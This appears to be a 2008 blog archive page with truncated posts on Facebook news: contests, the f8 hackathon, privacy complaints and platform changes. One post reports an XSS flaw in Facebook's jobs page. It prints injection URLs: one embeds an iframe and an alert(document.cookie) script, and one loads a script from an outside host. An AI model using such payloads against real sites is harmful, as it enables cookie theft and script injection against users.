Let’s image that you go on a populous and secure website like Facebook for instance. And let’s image that you click on someone profile picture just to see it. After all, you’re on a secure website and a website like facebook will not allow redirection, isn’t it?!!! It is probably right, a website like Facebook, […]
9th of August 2008: I am sorry guys, but it seems that, for an obscure reason, Facebook has blocked this joke!!!! So it is not working anymore!!!
According to the FUCA 8.1 (Facebook Ugliest Contest Award - first semester 2008), Facebook users have voted for the ugliest Facebook profile. This is the first contest […]
If you like late-night Chinese food, Red Bull, Office Ripstik races and Rock Band Jam sessions, this f8 hackathon is just for you.
You might also contribute to build the facebook platform of tomorrow:
“Hackathon is an all-night-long hack session that gives every Facebook engineer a chance to work on that awesome feature they’ve been meaning to […]
Facebook published on the 27th of June an article about “Building Trust and Protecting User Privacy” because “Privacy is at the core of Facebook”.
Because ” Facebook work to help clarify standards and maintain user trust” in applications available on Facebook, they recently suspended “Top Friends“, an application used by millions of users, one of the […]
13 months after the inaugural f8 facebook even (it was on the 24th of May 2007), following are some numbers about the facebook ecosystem:
- 400.000+ Developers (in more than 160 different countries)
- 24.000+ Applications in the Directory
- 80.000.000 active Users
And, as you can see on the Alexa graph above and in term of percent, for […]
Still a week ago, if you wanted to test a facbook application you had to install it and let it access to personal information.
Now… you still have to let the application access to personal information but, after a few tests, if you don’t like the application you don’t need to edit your profile settings to […]
According to the SANS newsBites from this 3rd of June:
“The Canadian Internet Policy and Public Interest Clinic (CIPPIC) has filed a complaint alleging that the social networking site Facebook violated numerous aspects of the Canadian Personal Information Protection and Electronic Documents Act. The complaint alleges that Facebook failed to let users know how their […]
Facebook as decided to suspend applications like Google’s Friends Connect and MySpace’s Data Availability “to access to Facebook user information until it comes into compliance” announced Charlie Cheever on this 15 of May.
Charlie also added:
“We think MySpace’s Data Availability, Google Friend Connect, and Facebook Connect can be part of a great movement in the industry […]
This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.
xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.
Redirection sample:
http://www.xssed.com/mirror/34274/
or
Insertion in a hidden iframe:
http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
{smartads}
According to Dimitris Pagkalos from xssed.com:
“I’m quite sure there […]
Facebook development is still in ebullition.
After the previous announcement of Facebook profile improvements in February, some of these improvements where confirmed last week.
These confirmed improvements concern:
1/ New feed stories: feed tab is front-and-center on users’ profiles (feed stories is going to continue to be a primary way users express themselves), three sizes of stories […]
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| « Mar | ||||||
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 | |
